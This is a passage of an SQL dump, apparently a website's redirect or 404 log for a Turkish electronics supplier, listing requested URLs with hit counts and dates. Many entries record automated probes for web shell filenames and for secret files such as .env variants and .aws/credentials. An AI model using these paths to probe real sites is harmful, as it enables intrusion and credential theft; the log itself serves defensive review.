00:00:00',301),(31385,'https://www.3s-technologies.com.tr/en/pcb-prototip-prototyping/pcb-outline&sa=u&ved=2ahukewjg-bfivfx7ahuol0qihucybygqfnoeccwqag&usg=aovvaw1axkb_vhxmnaz8t4yrd07h',NULL,'','',2,0,'2022-12-13 02:50:59','0000-00-00 00:00:00',301),(31386,'https://www.3s-technologies.com.tr/tr/title=',NULL,'','',5,0,'2022-12-13 06:58:57','0000-00-00 00:00:00',301),(31387,'https://3s-technologies.com.tr/wso112233.php',NULL,'','',4,0,'2022-12-13 07:49:01','0000-00-00 00:00:00',301),(31388,'https://3s-technologies.com.tr/ack_log.php',NULL,'','',1,0,'2022-12-13 12:24:41','0000-00-00 00:00:00',301),(31389,'http://3s-technologies.com.tr/tr/dropzone/dropzone-amd-module.min.js',NULL,'','',2,0,'2022-12-13 16:31:12','0000-00-00 00:00:00',301),(31390,'https://3s-technologies.com.tr/bala.php',NULL,'','',4,0,'2022-12-14 14:25:35','0000-00-00 00:00:00',301),(31391,'https://3s-technologies.com.tr/wp-commentin.php',NULL,'','',3,0,'2022-12-14 14:29:53','0000-00-00 00:00:00',301),(31392,'https://3s-technologies.com.tr/xleet-shell.php',NULL,'','',3,0,'2022-12-14 14:39:20','0000-00-00 00:00:00',301),(31393,'http://3s-technologies.com.tr/tr/legion.php',NULL,'','',13,0,'2022-12-15 04:35:07','0000-00-00 00:00:00',301),(31394,'http://3s-technologies.com.tr/tr/uindex.php',NULL,'','',2,0,'2022-12-15 04:35:07','0000-00-00 00:00:00',301),(31395,'http://3s-technologies.com.tr/tr/vindex.php',NULL,'','',1,0,'2022-12-15 04:35:09','0000-00-00 00:00:00',301),(31396,'http://3s-technologies.com.tr/tr/asus.php',NULL,'','',30,0,'2022-12-15 04:35:09','0000-00-00 00:00:00',301),(31397,'http://3s-technologies.com.tr/tr/legion_1.php',NULL,'','',1,0,'2022-12-15 04:35:09','0000-00-00 00:00:00',301),(31398,'http://3s-technologies.com.tr/tr/legion2.php',NULL,'','',1,0,'2022-12-15 04:35:11','0000-00-00 00:00:00',301),(31399,'http://3s-technologies.com.tr/tr/chitoge.php?chitoge',NULL,'','',1,0,'2022-12-15 04:35:11','0000-00-00 00:00:00',301),(31400,'http://3s-technologies.com.tr/tr/ganyu.php?chitoge',NULL,'','',1,0,'2022-12-15 04:35:13','0000-00-00 00:00:00',301),(31401,'http://3s-technologies.com.tr/tr/pler.php?chitoge',NULL,'','',1,0,'2022-12-15 04:35:13','0000-00-00 00:00:00',301),(31402,'http://3s-technologies.com.tr/tr/dropzone/dropzone.js',NULL,'','',1,0,'2022-12-15 06:30:10','0000-00-00 00:00:00',301),(31403,'http://3s-technologies.com.tr/tr/wp-admin/style.php?sig=rename',NULL,'','',10,0,'2022-12-15 21:15:21','0000-00-00 00:00:00',301),(31404,'https://3s-technologies.com.tr/tr/index.php?option=com_user&view=register',NULL,'https://3s-technologies.com.tr/tr//index.php?option=com_user&view=register','',1,0,'2022-12-17 05:34:34','0000-00-00 00:00:00',301),(31405,'http://3s-technologies.com.tr/tr/assets/dropzone/dropzone-amd-module.min.js',NULL,'','',1,0,'2022-12-19 03:29:07','0000-00-00 00:00:00',301),(31406,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/cnc',NULL,'','',8,0,'2022-12-21 00:55:20','0000-00-00 00:00:00',301),(31407,'http://3s-technologies.com.tr/tr/assets/js/dropzone/dropzone-amd-module.min.js',NULL,'','',2,0,'2022-12-21 07:26:53','0000-00-00 00:00:00',301),(31408,'http://3s-technologies.com.tr/tr/wp-content/plugins/wpyii2/wpyii2.php',NULL,'','',3,0,'2022-12-22 11:53:37','0000-00-00 00:00:00',301),(31409,'http://3s-technologies.com.tr/tr/wp-content/plugins/wpzip/wpzip.php',NULL,'','',3,0,'2022-12-22 11:53:50','0000-00-00 00:00:00',301),(31410,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/wpyii2/wpyii2.php',NULL,'','',1,0,'2022-12-22 12:03:11','0000-00-00 00:00:00',301),(31411,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/wpzip/wpzip.php',NULL,'','',1,0,'2022-12-22 12:03:28','0000-00-00 00:00:00',301),(31412,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/wpyii2/wpyii2.php',NULL,'','',1,0,'2022-12-22 12:03:48','0000-00-00 00:00:00',301),(31413,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/wpzip/wpzip.php',NULL,'','',1,0,'2022-12-22 12:04:08','0000-00-00 00:00:00',301),(31414,'http://3s-technologies.com.tr/tr/.env.www',NULL,'','',3,0,'2022-12-23 02:43:08','0000-00-00 00:00:00',301),(31415,'https://3s-technologies.com.tr/tr/.env.www',NULL,'','',3,0,'2022-12-23 02:43:10','0000-00-00 00:00:00',301),(31416,'http://3s-technologies.com.tr/tr/.env_1',NULL,'','',4,0,'2022-12-23 02:43:15','0000-00-00 00:00:00',301),(31417,'https://3s-technologies.com.tr/tr/.env_1',NULL,'','',3,0,'2022-12-23 02:43:16','0000-00-00 00:00:00',301),(31418,'http://3s-technologies.com.tr/tr/.env_sample',NULL,'','',4,0,'2022-12-23 02:43:20','0000-00-00 00:00:00',301),(31419,'https://3s-technologies.com.tr/tr/.env_sample',NULL,'','',3,0,'2022-12-23 02:43:22','0000-00-00 00:00:00',301),(31420,'https://3s-technologies.com.tr/tr/.aws/credentials',NULL,'','',20,0,'2022-12-23 02:43:27','0000-00-00 00:00:00',301),(31421,'http://3s-technologies.com.tr/tr/_static/.env',NULL,'','',3,0,'2022-12-23 02:43:30','0000-00-00 00:00:00',301),(31422,'https://3s-technologies.com.tr/tr/_static/.env',NULL,'','',3,0,'2022-12-23 02:43:32','0000-00-00 00:00:00',301),(31423,'http://3s-technologies.com.tr/tr/.c9/metadata/environment/.env',NULL,'','',1,0,'2022-12-23 02:43:36','0000-00-00 00:00:00',301),(31424,'https://3s-technologies.com.tr/tr/.c9/metadata/environment/.env',NULL,'','',1,0,'2022-12-23 02:43:37','0000-00-00 00:00:00',301),(31425,'https://3s-technologies.com.tr/tr/.docker/.env',NULL,'','',3,0,'2022-12-23 02:43:42','0000-00-00 00:00:00',301),(31426,'https://3s-technologies.com.tr/tr/.env.backup',NULL,'','',22,0,'2022-12-23 02:43:47','0000-00-00 00:00:00',301),(31427,'https://3s-technologies.com.tr/tr/.env.dev',NULL,'','',14,0,'2022-12-23 02:43:52','0000-00-00 00:00:00',301),(31428,'http://www.3s-technologies.com.tr/en/wp-content/themes/seotheme/db.php?u',NULL,'www.google.com','',5,0,'2022-12-23 03:36:29','0000-00-00 00:00:00',301),(31429,'http://www.3s-technologies.com.tr/en/mijvgoqt.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-12-23 03:36:29','0000-00-00 00:00:00',301),(31430,'https://www.3s-technologies.com.tr/en/wp-content/themes/seotheme/db.php?u',NULL,'www.google.com','',5,0,'2022-12-23 03:36:30','0000-00-00 00:00:00',301),(31431,'https://www.3s-technologies.com.tr/en/celzepka.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-12-23 03:36:31','0000-00-00 00:00:00',301),(31432,'http://www.3s-technologies.com.tr/tr/wp/xmlrpc.php',NULL,'','',2,0,'2022-12-25 03:37:46','0000-00-00 00:00:00',301),(31433,'http://www.3s-technologies.com.tr/tr/wordpress/xmlrpc.php',NULL,'','',2,0,'2022-12-25 03:37:54','0000-00-00 00:00:00',301),(31434,'http://www.3s-technologies.com.tr/tr/old/xmlrpc.php',NULL,'','',2,0,'2022-12-25 03:38:02','0000-00-00 00:00:00',301),(31435,'http://www.3s-technologies.com.tr/tr/new/xmlrpc.php',NULL,'','',2,0,'2022-12-25 03:38:16','0000-00-00 00:00:00',301),(31436,'http://www.3s-technologies.com.tr/tr/blog/xmlrpc.php',NULL,'','',2,0,'2022-12-25 03:38:37','0000-00-00 00:00:00',301),(31437,'http://mail.3s-technologies.com.tr/tr/oldsite',NULL,'http://mail.3s-technologies.com.tr/oldsite','',5,0,'2022-12-25 21:23:16','0000-00-00 00:00:00',301),(31438,'http://mail.3s-technologies.com.tr/tr/wp-old',NULL,'http://mail.3s-technologies.com.tr/wp-old','',5,0,'2022-12-25 21:23:17','0000-00-00 00:00:00',301),(31439,'http://mail.3s-technologies.com.tr/tr/2022',NULL,'http://mail.3s-technologies.com.tr/2022','',5,0,'2022-12-25 21:23:18','0000-00-00 00:00:00',301),(31440,'http://mail.3s-technologies.com.tr/tr/www',NULL,'http://mail.3s-technologies.com.tr/www','',15,0,'2022-12-25 21:23:22','0000-00-00 00:00:00',301),(31441,'http://mail.3s-technologies.com.tr/tr/2021',NULL,'http://mail.3s-technologies.com.tr/2021','',5,0,'2022-12-25 21:23:23','0000-00-00 00:00:00',301),(31442,'http://mail.3s-technologies.com.tr/tr/shop',NULL,'http://mail.3s-technologies.com.tr/SHOP','',24,0,'2022-12-25 21:23:25','0000-00-00 00:00:00',301),(31443,'http://mail.3s-technologies.com.tr/tr/sitio',NULL,'http://mail.3s-technologies.com.tr/sitio','',5,0,'2022-12-25 21:23:27','0000-00-00 00:00:00',301),(31444,'http://mail.3s-technologies.com.tr/tr/bac',NULL,'http://mail.3s-technologies.com.tr/bac','',5,0,'2022-12-25 21:23:27','0000-00-00 00:00:00',301),(31445,'http://www.3s-technologies.com.tr/tr/wp-old',NULL,'http://www.3s-technologies.com.tr/wp-old','',1,0,'2022-12-26 00:19:08','0000-00-00 00:00:00',301),(31446,'http://www.3s-technologies.com.tr/tr/2022',NULL,'http://www.3s-technologies.com.tr/2022','',1,0,'2022-12-26 00:19:08','0000-00-00 00:00:00',301),(31447,'http://www.3s-technologies.com.tr/tr/www',NULL,'http://www.3s-technologies.com.tr/www','',3,0,'2022-12-26 00:19:16','0000-00-00 00:00:00',301),(31448,'http://www.3s-technologies.com.tr/tr/2021',NULL,'http://www.3s-technologies.com.tr/2021','',1,0,'2022-12-26 00:19:18','0000-00-00 00:00:00',301),(31449,'http://www.3s-technologies.com.tr/tr/shop',NULL,'http://www.3s-technologies.com.tr/SHOP','',13,0,'2022-12-26 00:19:22','0000-00-00 00:00:00',301),(31450,'http://www.3s-technologies.com.tr/tr/sitio',NULL,'http://www.3s-technologies.com.tr/sitio','',1,0,'2022-12-26 00:19:26','0000-00-00 00:00:00',301),(31451,'http://www.3s-technologies.com.tr/tr/bac',NULL,'http://www.3s-technologies.com.tr/bac','',1,0,'2022-12-26 00:19:26','0000-00-00 00:00:00',301),(31452,'http://3s-technologies.com.tr/wp-content/admin.php',NULL,'http://3s-technologies.com.tr','',1,0,'2022-12-26 12:57:36','0000-00-00 00:00:00',301),(31453,'http://3s-technologies.com.tr/tr/.sts.php',NULL,'','',1,0,'2022-12-28 05:20:42','0000-00-00 00:00:00',301),(31454,'http://3s-technologies.com.tr/mgmt/tm/util/bash',NULL,'','',2,0,'2022-12-28 23:20:14','0000-00-00 00:00:00',301),(31455,'http://3s-technologies.com.tr/tr/wsa.php',NULL,'','',114,0,'2023-01-01 14:26:07','0000-00-00 00:00:00',301),(31456,'https://3s-technologies.com.tr/en/sitemap.xml',NULL,'https://3s-technologies.com.tr/sitemap.xml','',66,0,'2023-01-03 22:58:21','0000-00-00 00:00:00',301),(31457,'http://www.3s-technologies.com.tr/en/ads.txt',NULL,'http://www.3s-technologies.com.tr/ads.txt','',38,0,'2023-01-03 22:58:32','0000-00-00 00:00:00',301),(31458,'http://www.3s-technologies.com.tr/en/wood-processing-ah?ap-i?leme',NULL,'','',2,0,'2023-01-06 02:47:01','0000-00-00 00:00:00',301),(31459,'http://www.3s-technologies.com.tr/en/akrilik-i?leme-acrylic-processing',NULL,'','',3,0,'2023-01-06 02:47:05','0000-00-00 00:00:00',301),(31460,'http://www.3s-technologies.com.tr/en/aluminyum-i?leme-aluminum-processing',NULL,'','',3,0,'2023-01-06 02:47:07','0000-00-00 00:00:00',301),(31461,'http://www.3s-technologies.com.tr/en/ah?ap-i?leme-wood-processing-120cm',NULL,'','',2,0,'2023-01-06 02:47:10','0000-00-00 00:00:00',301),(31462,'http://www.3s-technologies.com.tr/tr/deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php = >> shell no work',NULL,'https://www.google.com','',3,0,'2023-01-06 03:00:44','0000-00-00 00:00:00',301),(31463,'http://www.3s-technologies.com.tr/tr/wp-admin/deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php = >> shell no work',NULL,'https://www.google.com','',3,0,'2023-01-06 03:00:46','0000-00-00 00:00:00',301),(31464,'http://www.3s-technologies.com.tr/tr/wp-content/deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php = >> shell no work',NULL,'https://www.google.com','',3,0,'2023-01-06 03:00:47','0000-00-00 00:00:00',301),(31465,'http://www.3s-technologies.com.tr/tr/xleet.php',NULL,'https://www.google.com','',6,0,'2023-01-06 03:00:49','0000-00-00 00:00:00',301),(31466,'http://www.3s-technologies.com.tr/tr/0byte.php',NULL,'https://www.google.com','',6,0,'2023-01-06 03:00:51','0000-00-00 00:00:00',301),(31467,'http://www.3s-technologies.com.tr/tr/sym.php',NULL,'https://www.google.com','',4,0,'2023-01-06 03:00:56','0000-00-00 00:00:00',301),(31468,'http://www.3s-technologies.com.tr/tr/sym403.php',NULL,'https://www.google.com','',4,0,'2023-01-06 03:00:58','0000-00-00 00:00:00',301),(31469,'http://www.3s-technologies.com.tr/tr/xl.php',NULL,'https://www.google.com','',5,0,'2023-01-06 03:00:59','0000-00-00 00:00:00',301),(31470,'http://www.3s-technologies.com.tr/tr/symlink.php',NULL,'https://www.google.com','',4,0,'2023-01-06 03:01:01','0000-00-00 00:00:00',301),(31471,'http://www.3s-technologies.com.tr/tr/403.php',NULL,'https://www.google.com','',30,0,'2023-01-06 03:01:06','0000-00-00 00:00:00',301),(31472,'http://www.3s-technologies.com.tr/tr/ok.php',NULL,'https://www.google.com','',14,0,'2023-01-06 03:01:13','0000-00-00 00:00:00',301),(31473,'http://www.3s-technologies.com.tr/tr/0.php',NULL,'https://www.google.com','',12,0,'2023-01-06 03:01:14','0000-00-00 00:00:00',301),(31474,'http://www.3s-technologies.com.tr/tr/a.php',NULL,'https://www.google.com','',15,0,'2023-01-06 03:01:37','0000-00-00 00:00:00',301),(31475,'http://www.3s-technologies.com.tr/tr/z.php',NULL,'https://www.google.com','',14,0,'2023-01-06 03:01:39','0000-00-00 00:00:00',301),(31476,'http://www.3s-technologies.com.tr/tr/e.php',NULL,'https://www.google.com','',5,0,'2023-01-06 03:01:42','0000-00-00 00:00:00',301),(31477,'http://www.3s-technologies.com.tr/tr/r.php',NULL,'https://www.google.com','',7,0,'2023-01-06 03:01:43','0000-00-00 00:00:00',301),(31478,'http://www.3s-technologies.com.tr/tr/t.php',NULL,'https://www.google.com','',14,0,'2023-01-06 03:01:44','0000-00-00 00:00:00',301),(31479,'http://www.3s-technologies.com.tr/tr/y.php',NULL,'https://www.google.com','',4,0,'2023-01-06 03:01:47','0000-00-00 00:00:00',301),(31480,'http://www.3s-technologies.com.tr/tr/u.php',NULL,'https://www.google.com','',3,0,'2023-01-06 03:01:49','0000-00-00 00:00:00',301),(31481,'http://www.3s-technologies.com.tr/tr/i.php',NULL,'https://www.google.com','',5,0,'2023-01-06 03:01:51','0000-00-00 00:00:00',301),(31482,'http://www.3s-technologies.com.tr/tr/o.php',NULL,'https://www.google.com','',11,0,'2023-01-06 03:01:53','0000-00-00 00:00:00',301),(31483,'http://www.3s-technologies.com.tr/tr/p.php',NULL,'https://www.google.com','',12,0,'2023-01-06 03:01:56','0000-00-00 00:00:00',301),(31484,'http://www.3s-technologies.com.tr/tr/q.php',NULL,'https://www.google.com','',3,0,'2023-01-06 03:01:57','0000-00-00 00:00:00',301),(31485,'http://www.3s-technologies.com.tr/tr/d.php',NULL,'https://www.google.com','',4,0,'2023-01-06 03:02:01','0000-00-00 00:00:00',301),(31486,'http://www.3s-technologies.com.tr/tr/f.php',NULL,'https://www.google.com','',5,0,'2023-01-06 03:02:04','0000-00-00 00:00:00',301),(31487,'http://www.3s-technologies.com.tr/tr/g.php',NULL,'https://www.google.com','',20,0,'2023-01-06 03:02:06','0000-00-00 00:00:00',301),(31488,'http://www.3s-technologies.com.tr/tr/h.php',NULL,'https://www.google.com','',8,0,'2023-01-06 03:02:07','0000-00-00 00:00:00',301),(31489,'http://www.3s-technologies.com.tr/tr/j.php',NULL,'https://www.google.com','',3,0,'2023-01-06 03:02:10','0000-00-00 00:00:00',301),(31490,'http://www.3s-technologies.com.tr/tr/k.php',NULL,'https://www.google.com','',18,0,'2023-01-06 03:02:12','0000-00-00 00:00:00',301),(31491,'http://www.3s-technologies.com.tr/tr/l.php',NULL,'https://www.google.com','',4,0,'2023-01-06 03:02:15','0000-00-00 00:00:00',301),(31492,'http://www.3s-technologies.com.tr/tr/w.php',NULL,'https://www.google.com','',16,0,'2023-01-06 03:02:18','0000-00-00 00:00:00',301),(31493,'http://www.3s-technologies.com.tr/tr/v.php',NULL,'https://www.google.com','',11,0,'2023-01-06 03:02:20','0000-00-00 00:00:00',301),(31494,'http://www.3s-technologies.com.tr/tr/n.php',NULL,'https://www.google.com','',7,0,'2023-01-06 03:02:22','0000-00-00 00:00:00',301),(31495,'http://www.3s-technologies.com.tr/tr/b.php',NULL,'https://www.google.com','',9,0,'2023-01-06 03:02:24','0000-00-00 00:00:00',301),(31496,'http://www.3s-technologies.com.tr/tr/c.php',NULL,'https://www.google.com','',8,0,'2023-01-06 03:02:26','0000-00-00 00:00:00',301),(31497,'http://www.3s-technologies.com.tr/tr/wp-wso.php',NULL,'https://www.google.com','',4,0,'2023-01-06 03:02:28','0000-00-00 00:00:00',301),(31498,'http://www.3s-technologies.com.tr/tr/minimo.php',NULL,'https://www.google.com','',4,0,'2023-01-06 03:02:32','0000-00-00 00:00:00',301),(31499,'http://www.3s-technologies.com.tr/tr/www.php',NULL,'https://www.google.com','',4,0,'2023-01-06 03:02:37','0000-00-00 00:00:00',301),(31500,'http://www.3s-technologies.com.tr/tr/100.php',NULL,'https://www.google.com','',11,0,'2023-01-06 03:02:38','0000-00-00 00:00:00',301),(31501,'http://www.3s-technologies.com.tr/tr/777.php',NULL,'https://www.google.com','',8,0,'2023-01-06 03:02:40','0000-00-00 00:00:00',301),(31502,'http://www.3s-technologies.com.tr/tr/defau1t.php',NULL,'https://www.google.com','',4,0,'2023-01-06 03:02:42','0000-00-00 00:00:00',301),(31503,'http://www.3s-technologies.com.tr/tr/xox.php',NULL,'https://www.google.com','',4,0,'2023-01-06 03:02:43','0000-00-00 00:00:00',301),(31504,'http://www.3s-technologies.com.tr/tr/wi.php',NULL,'https://www.google.com','',4,0,'2023-01-06 03:02:45','0000-00-00 00:00:00',301),(31505,'http://www.3s-technologies.com.tr/tr/mar.php',NULL,'https://www.google.com','',8,0,'2023-01-06 03:02:46','0000-00-00 00:00:00',301),(31506,'http://www.3s-technologies.com.tr/tr/nee.php',NULL,'https://www.google.com','',4,0,'2023-01-06 03:02:48','0000-00-00 00:00:00',301),(31507,'http://www.3s-technologies.com.tr/tr/lol.php',NULL,'https://www.google.com','',8,0,'2023-01-06 03:02:53','0000-00-00 00:00:00',301),(31508,'http://www.3s-technologies.com.tr/tr/87.php',NULL,'https://www.google.com','',3,0,'2023-01-06 03:02:55','0000-00-00 00:00:00',301),(31509,'http://www.3s-technologies.com.tr/tr/foxwsov1.php',NULL,'https://www.google.com','',4,0,'2023-01-06 03:03:00','0000-00-00 00:00:00',301),(31510,'http://www.3s-technologies.com.tr/tr/alf.php',NULL,'https://www.google.com','',3,0,'2023-01-06 03:03:02','0000-00-00 00:00:00',301),(31511,'http://www.3s-technologies.com.tr/tr/hello.php',NULL,'https://www.google.com','',9,0,'2023-01-06 03:03:07','0000-00-00 00:00:00',301),(31512,'http://www.3s-technologies.com.tr/tr/kk.php',NULL,'https://www.google.com','',7,0,'2023-01-06 03:03:10','0000-00-00 00:00:00',301),(31513,'http://www.3s-technologies.com.tr/tr/mrjn.php',NULL,'https://www.google.com','',5,0,'2023-01-06 03:03:13','0000-00-00 00:00:00',301),(31514,'http://www.3s-technologies.com.tr/tr/kn.php',NULL,'https://www.google.com','',5,0,'2023-01-06 03:03:15','0000-00-00 00:00:00',301),(31515,'http://www.3s-technologies.com.tr/tr/3301.php',NULL,'https://www.google.com','',5,0,'2023-01-06 03:03:16','0000-00-00 00:00:00',301),(31516,'http://www.3s-technologies.com.tr/tr/anone.php',NULL,'https://www.google.com','',5,0,'2023-01-06 03:03:23','0000-00-00 00:00:00',301),(31517,'http://www.3s-technologies.com.tr/tr/wp-configer.php',NULL,'https://www.google.com','',5,0,'2023-01-06 03:03:24','0000-00-00 00:00:00',301),(31518,'http://www.3s-technologies.com.tr/tr/wp-ad.php',NULL,'https://www.google.com','',5,0,'2023-01-06 03:03:25','0000-00-00 00:00:00',301),(31519,'http://www.3s-technologies.com.tr/tr/send.php',NULL,'https://www.google.com','',5,0,'2023-01-06 03:03:27','0000-00-00 00:00:00',301),(31520,'http://www.3s-technologies.com.tr/tr/.wp-cache.php',NULL,'https://www.google.com','',5,0,'2023-01-06 03:03:29','0000-00-00 00:00:00',301),(31521,'http://www.3s-technologies.com.tr/tr/sendmail.php',NULL,'https://www.google.com','',6,0,'2023-01-06 03:03:30','0000-00-00 00:00:00',301),(31522,'http://www.3s-technologies.com.tr/tr/rahma.php',NULL,'https://www.google.com','',5,0,'2023-01-06 03:03:32','0000-00-00 00:00:00',301),(31523,'http://www.3s-technologies.com.tr/tr/nasgor.php',NULL,'https://www.google.com','',5,0,'2023-01-06 03:03:33','0000-00-00 00:00:00',301),(31524,'http://www.3s-technologies.com.tr/tr/wp-confirm.php',NULL,'https://www.google.com','',5,0,'2023-01-06 03:03:35','0000-00-00 00:00:00',301),(31525,'http://www.3s-technologies.com.tr/tr/alfa123.php',NULL,'https://www.google.com','',5,0,'2023-01-06 03:03:37','0000-00-00 00:00:00',301),(31526,'http://www.3s-technologies.com.tr/tr/bypass.php',NULL,'https://www.google.com','',9,0,'2023-01-06 03:03:41','0000-00-00 00:00:00',301),(31527,'http://www.3s-technologies.com.tr/tr/wp-one.php',NULL,'https://www.google.com','',5,0,'2023-01-06 03:03:42','0000-00-00 00:00:00',301),(31528,'http://www.3s-technologies.com.tr/tr/alexus.php',NULL,'https://www.google.com','',5,0,'2023-01-06 03:03:45','0000-00-00 00:00:00',301),(31529,'http://www.3s-technologies.com.tr/tr/wso1337.php',NULL,'https://www.google.com','',5,0,'2023-01-06 03:03:46','0000-00-00 00:00:00',301),(31530,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/ddm-novastar/smd-fä±rä±n/by,product_sku?language=tr-tr&keyword=',NULL,'','',10,0,'2023-01-06 05:34:41','0000-00-00 00:00:00',301),(31531,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/ddm-novastar/smd-fä±rä±n/by,mf_name?language=tr-tr&keyword=',NULL,'','',10,0,'2023-01-06 05:34:42','0000-00-00 00:00:00',301),(31532,'http://3s-technologies.com.tr/tr/makhdamx.php',NULL,'','',12,0,'2023-01-07 04:06:43','0000-00-00 00:00:00',301),(31533,'http://3s-technologies.com.tr/tr/xltavrat.php',NULL,'','',9,0,'2023-01-07 04:06:56','0000-00-00 00:00:00',301),(31534,'http://3s-technologies.com.tr/tr/wp-content/plugins/seoplugins/index.php',NULL,'','',77,0,'2023-01-07 04:07:04','0000-00-00 00:00:00',301),(31535,'http://3s-technologies.com.tr/tr/wso112233.php',NULL,'','',115,0,'2023-01-07 04:07:08','0000-00-00 00:00:00',301),(31536,'http://3s-technologies.com.tr/tr/wp-content/plugins/seoplugins/mar.php',NULL,'','',123,0,'2023-01-07 04:07:19','0000-00-00 00:00:00',301),(31537,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/wp-login.php',NULL,'','',8,0,'2023-01-07 04:07:27','0000-00-00 00:00:00',301),(31538,'http://3s-technologies.com.tr/tr/0z.php',NULL,'','',24,0,'2023-01-07 04:07:30','0000-00-00 00:00:00',301),(31539,'http://3s-technologies.com.tr/en/79-english-uk/101-panasonic-overview-2',NULL,'','',13,0,'2023-01-09 11:40:45','0000-00-00 00:00:00',301),(31540,'https://3s-technologies.com.tr/en/home-en/79-english-uk/101-panasonic-overview-2',NULL,'','',1,0,'2023-01-09 17:04:23','0000-00-00 00:00:00',301),(31541,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/templates/atomic/home-page-atomic/79-english-uk/101-panasonic-overview-2',NULL,'','',1,0,'2023-01-09 20:17:32','0000-00-00 00:00:00',301),(31542,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/templates/beez-2/home-page-beez-2/79-english-uk/101-panasonic-overview-2',NULL,'','',1,0,'2023-01-10 02:56:01','0000-00-00 00:00:00',301),(31543,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/79-english-uk/101-panasonic-overview-2',NULL,'','',2,0,'2023-01-10 07:28:13','0000-00-00 00:00:00',301),(31544,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/using-joomla/extensions/templates/atomic/home-page-atomic/79-english-uk/101-panasonic-overview-2',NULL,'','',2,0,'2023-01-10 10:18:08','0000-00-00 00:00:00',301),(31545,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=1',NULL,'','',1,0,'2023-01-11 04:29:11','0000-00-00 00:00:00',301),(31546,'http://www.3s-technologies.com.tr/en/index.php?option=anket_sonuclari&id=1',NULL,'','',1,0,'2023-01-11 04:29:17','0000-00-00 00:00:00',301),(31547,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=29',NULL,'','',1,0,'2023-01-11 04:29:20','0000-00-00 00:00:00',301),(31548,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=14',NULL,'','',1,0,'2023-01-11 04:29:25','0000-00-00 00:00:00',301),(31549,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=4',NULL,'','',1,0,'2023-01-11 04:29:31','0000-00-00 00:00:00',301),(31550,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=28',NULL,'','',1,0,'2023-01-11 04:29:32','0000-00-00 00:00:00',301),(31551,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=5',NULL,'','',1,0,'2023-01-11 04:29:34','0000-00-00 00:00:00',301),(31552,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=13',NULL,'','',1,0,'2023-01-11 04:29:36','0000-00-00 00:00:00',301),(31553,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=3',NULL,'','',1,0,'2023-01-11 04:29:40','0000-00-00 00:00:00',301),(31554,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=15',NULL,'','',1,0,'2023-01-11 04:29:42','0000-00-00 00:00:00',301),(31555,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=54',NULL,'','',1,0,'2023-01-11 04:29:44','0000-00-00 00:00:00',301),(31556,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=30',NULL,'','',1,0,'2023-01-11 04:29:45','0000-00-00 00:00:00',301),(31557,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=33',NULL,'','',1,0,'2023-01-11 04:29:47','0000-00-00 00:00:00',301),(31558,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=59',NULL,'','',1,0,'2023-01-11 04:29:51','0000-00-00 00:00:00',301),(31559,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=58',NULL,'','',1,0,'2023-01-11 04:29:51','0000-00-00 00:00:00',301),(31560,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=16',NULL,'','',1,0,'2023-01-11 04:29:54','0000-00-00 00:00:00',301),(31561,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=55',NULL,'','',1,0,'2023-01-11 04:29:55','0000-00-00 00:00:00',301),(31562,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=2',NULL,'','',1,0,'2023-01-11 04:29:57','0000-00-00 00:00:00',301),(31563,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=7',NULL,'','',1,0,'2023-01-11 04:29:58','0000-00-00 00:00:00',301),(31564,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=62',NULL,'','',1,0,'2023-01-11 04:30:00','0000-00-00 00:00:00',301),(31565,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=36',NULL,'','',1,0,'2023-01-11 04:30:02','0000-00-00 00:00:00',301),(31566,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=63',NULL,'','',1,0,'2023-01-11 04:30:03','0000-00-00 00:00:00',301),(31567,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=6',NULL,'','',1,0,'2023-01-11 04:30:05','0000-00-00 00:00:00',301),(31568,'http://www.3s-technologies.com.tr/en/index.php?option=misyon',NULL,'','',1,0,'2023-01-11 04:30:08','0000-00-00 00:00:00',301),(31569,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=60',NULL,'','',1,0,'2023-01-11 04:30:09','0000-00-00 00:00:00',301),(31570,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=8',NULL,'','',1,0,'2023-01-11 04:30:11','0000-00-00 00:00:00',301),(31571,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=61',NULL,'','',1,0,'2023-01-11 04:30:12','0000-00-00 00:00:00',301),(31572,'http://www.3s-technologies.com.tr/en/index.php?option=site_haritasi',NULL,'','',1,0,'2023-01-11 04:30:14','0000-00-00 00:00:00',301),(31573,'http://www.3s-technologies.com.tr/en/index.php?option=urunler&id=9',NULL,'','',1,0,'2023-01-11 04:30:20','0000-00-00 